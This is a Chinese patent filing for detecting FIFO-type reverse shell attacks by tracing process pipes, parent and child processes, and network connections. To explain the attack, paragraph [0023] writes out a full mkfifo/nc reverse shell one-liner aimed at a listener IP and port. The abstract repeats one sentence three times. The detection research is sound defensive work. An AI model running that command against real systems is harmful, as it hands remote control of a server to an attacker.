本发明专利技术公开了一种反弹shell检测方法,所述方法包括:获取本地正在运行的各个进程事件的进程信息,基于目标进程事件的进程信息,判断所述目标进程事件的标准输入命令是否属于指定类型文件;若所述目标进程事件的标准输入命令属于所述指定类型文件,则获取所述目标进程事件的行为信息,并查询所述目标进程事件的父进程事件和子进程事件;获取所述父进程事件的行为信息和所述子进程事件的行为信息,并基于所述目标进程事件的行为信息、所述父进程事件的行为信息和所述子进程事件的行为信息,判断本地是否存在反弹shell攻击。本申请提供的技术方案,可以及时发现反弹shell攻击行为。可以及时发现反弹shell攻击行为。可以及时发现反弹shell攻击行为。
【技术实现步骤摘要】
一种反弹shell检测方法及装置
[0001]本专利技术涉及互联网
,特别涉及一种反弹shell检测方法及装置。
技术介绍
[0002]随着互联网的快速发展,随之而来的是诸多安全问题,网络上的恶意攻击行为日渐增长,其中,反弹shell利用输入输出重定向,实现远程控制目标服务器的目的,目前已成为一种常见的入侵手段。为提高网络的安全性,人们越来越重视对反弹shell攻击事件的分析工作。现有的分析技术,主要依靠特征匹配、日志监控、资源监控等技术来检测入侵行为,或者依靠内核hook函数对进程事件进行检测。
[0003]但是特征匹配、日志监控、资源监控等技术属于事后检测,实时性不够,并且不易溯源。而通过内核hook函数对进程事件进行检测,则需要重新编译内核模块,对系统入侵性高,不仅使用不方便,而且性能开销高,稳定性差。
[0004]鉴于此,有必要提供一种新的反弹shell检测方法和装置以解决上述不足。
技术实现思路
[0005]本申请的目的在于提供一种新的反弹shell检测方法及装置,可以及时发现反弹shell攻击行为。
[0006]为实现上述目的,本申请一方面提供一种反弹shell检测方法,所述方法包括:获取本地正在运行的各个进程事件的进程信息,对所述各个进程事件中的任意一个目标进程事件,基于所述目标进程事件的进程信息,判断所述目标进程事件的标准输入命令是否属于指定类型文件;若所述目标进程事件的标准输入命令属于所述指定类型文件,则获取所述目标进程事件的行为信息,并查询所述目标进程事件的父进程事件和子进程事件;获取所述父进程事件的行为信息和所述子进程事件的行为信息,并基于所述目标进程事件的行为信息、所述父进程事件的行为信息和所述子进程事件的行为信息,判断本地是否存在反弹shell攻击。
[0007]为实现上述目的,本申请另一方面还提供一种反弹shell检测装置,所述装置包括:进程解析模块,用于获取本地正在运行的各个进程事件的进程信息,对所述各个进程事件中的任意一个目标进程事件,基于所述目标进程事件的进程信息,判断所述目标进程事件的标准输入命令是否属于指定类型文件;进程查询模块,用于若所述目标进程事件的标准输入命令属于所述指定类型文件,则获取所述目标进程事件的行为信息,并查询所述目标进程事件的父进程事件和子进程事件;行为分析模块,用于获取所述父进程事件的行为信息和所述子进程事件的行为信息,并基于所述目标进程事件的行为信息、所述父进程事件的行为信息和所述子进程事件的行为信息,判断本地是否存在反弹shell攻击。
[0008]为实现上述目的,本申请另一方面还提供一种反弹shell检测装置,所述反弹shell检测装置包括存储器和处理器,所述存储器用于存储计算机程序,当所述计算机程序被所述处理器执行时,实现上述反弹shell检测的方法。
[0009]由此可见,本申请提供的技术方案,通过实时监测本地正在运行的各种进程事件,并对上述进程事件进行解析,可以获取到本地正在运行的各个进程事件对应的进程信息。针对其中任意一个进程事件,通过对该进程事件及其父进程事件和子进程事件进行分析,可以获取上述多个进程事件的数据特征,并结合反弹shell的攻击原理,对上述获取到的数据特征进行分析,从而使得运维人员可以实时监测和发现反弹shell攻击行为。进一步的,当发生反弹shell攻击时,系统可以及时产生告警信息,以通知运维人员进行溯源分析和阻断攻击操作。
附图说明
[0010]为了更清楚地说明本申请实施例中的技术方案,下面将对实施例描述中所需要使用的附图作简单地介绍,显而易见地,下面描述中的附图仅仅是本申请的一些实施例,对于本领域普通技术人员来讲,在不付出创造性劳动的前提下,还可以根据这些附图获得其他的附图。
[0011]图1是本申请对fifo类型反弹shell进行介绍的示意图;
[0012]图2是本申请实施方式一中反弹shell检测方法的流程图;
[0013]图3是本申请实施方式一中进程行为信息匹配的流程图;
[0014]图4是本专利技术实施方式中反弹shell检测装置的功能模块示意图;
[0015]图5是本专利技术实施方式中反弹shell检测装置的结构示意图。
具体实施方式
[0016]为使本申请的目的、技术方案和优点更加清楚,下面将结合附图对本申请实施方式作进一步地详细描述。
[0017]随着互联网的快速发展,随之而来的是诸多安全问题,网络上的恶意攻击行为日渐增长,其中,反弹shell利用输入输出重定向,实现远程控制目标服务器的目的,目前已成为一种常见的入侵手段。反弹shell分为多种类型,其中,fifo类型的反弹shell利用fifo类型文件,通过FIFOpipe管道在进程间传递指令流,最终通过网络通信将指令流转到控制端,达到将命令行的输入输出转到控制端的目的。
[0018]为提高网络的安全性,人们越来越重视对反弹shell攻击事件的分析工作。在实际应用中,运维人员通常依靠特征匹配、日志监控、资源监控等技术来检测入侵行为,或者依靠内核hook函数对进程事件进行检测。但是特征匹配、日志监控、资源监控等技术属于事后检测,实时性不够,并且不易溯源。而通过内核hook函数对进程事件进行检测,则需要重新编译内核模块,对系统入侵性高,不仅使用不方便,而且性能开销高,稳定性差。
[0019]因此,如何对进程事件进行实时监测与分析,从而及时发现反弹shell攻击行为,便成为本领域亟需解决的课题。
[0020]本申请提供的技术方案可以解决上述不足。
[0021]为便于理解本申请中涉及到的反弹shell攻击行为,下面对其进行简要介绍。
[0022]反弹shell的本质是控制端监听目标服务器的某个TCP/UDP端口,目标服务器主动发起请求到控制端监听的端口,从而使得控制端可以向目标服务器远程输入执行指令,而目标服务器则执行控制端输入的执行指令,并向控制端反馈执行结果。
[0023]下面结合图1,以目标服务器运行“rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh
‑
i2>&1|nc 192.168.3.111 7777>/tmp/f”为例,对fifo类型反弹shell的原理进行说明。
[0024]“mkfifo/tmp/f”表示在tmp目录下写fifo文件f,从而创建一个fifo类型文件(即/tmp/f)。“cat/tmp/f”表示读取/tmp/f文件,cat进程实际获取到的为/tmp/f的内容,同时cat进程将FIFO pipe 1管道中的内容(即/tmp/f)输出传递给/bin/sh进程。“/bin/sh
‑
i 2>&1”表示将/bin/sh的标准错误输出重定向到标准输出,因此,/bin/sh进程会执行FIFO pipe 1管道中的指令,并将执行结果通过FIFO pipe 本文档来自技高网...
【技术保护点】
【技术特征摘要】
1.一种反弹shell检测方法,其特征在于,所述方法包括:获取本地正在运行的各个进程事件的进程信息,对所述各个进程事件中的任意一个目标进程事件,基于所述目标进程事件的进程信息,判断所述目标进程事件的标准输入命令是否属于指定类型文件;若所述目标进程事件的标准输入命令属于所述指定类型文件,则获取所述目标进程事件的行为信息,并查询所述目标进程事件的父进程事件和子进程事件;获取所述父进程事件的行为信息和所述子进程事件的行为信息,并基于所述目标进程事件的行为信息、所述父进程事件的行为信息和所述子进程事件的行为信息,判断本地是否存在反弹shell攻击。2.根据权利要求1所述的方法,其特征在于,在获取所述父进程事件的行为信息之前,所述方法还包括:判断所述父进程事件是否属于目标事件类型,若所述父进程事件属于目标事件类型,则获取所述父进程事件的行为信息。3.根据权利要求2所述的方法,其特征在于,所述获取所述目标进程事件的行为信息至少包括:获取所述目标进程事件的标准输入指令和标准输出指令;所述获取所述父进程事件的行为信息、所述子进程事件的行为信息至少包括:获取所述父进程事件的标准输入指令和标准输出指令,以及所述子进程事件的标准输入指令和标准输出指令。4.根据权利要求3所述的方法,其特征在于,基于所述目标进程事件的行为信息、所述父进程事件的行为信息和所述子进程事件的行为信息,判断本地是否存在反弹shell攻击包括:判断所述父进程事件的行为信息与所述目标进程事件的行为信息是否匹配,若匹配,则判断所述子进程事件的行为信息与所述目标进程事件的行为信息是否匹配;若匹配,则判断所述父进程事件、所述目标进程事件和所述子进程事件是否构成闭环,若构成闭环,则基于网络连接信息判断本地是否存在反弹shell攻击。5.根据权利要求4所述的方法,其特征在于,判断所述父进程事件的行为信息与所述目标进程事件的行为信息是否匹配包括:基于管道标识,判断所述父进程事件的标准输入指令与所述目标进程事件的标准输出指令是否相同,或者所述父进程事件的标准输出指令与所述目标进程事件的标准输入指令是否相同;若相同,则所述父进程事件的行为信息与所述目标进程事件的行为信息相匹配。6.根据权利要求5所述的方法,其特征在于,判断所述子进程事件的行为信息与所述目标进程事件的行为信息是否匹配包括:基于管道标识,判断所述子进程事件的标准输入指令与所述目标进程事件的标准输出指令是否相同,或者所述子进程事件的标准输出指令与所述目标进程事件的标准输入指令是否相同;若相同,则所述子进程事件的行为信息与所述目标进程事件的行为信息相匹配。7.根据...
【专利技术属性】
技术研发人员:林馨,李春艺,
申请(专利权)人:网宿科技股份有限公司,
类型:发明
国别省市:
还没有人留言评论。发表了对其他浏览者有用的留言会获得科技券。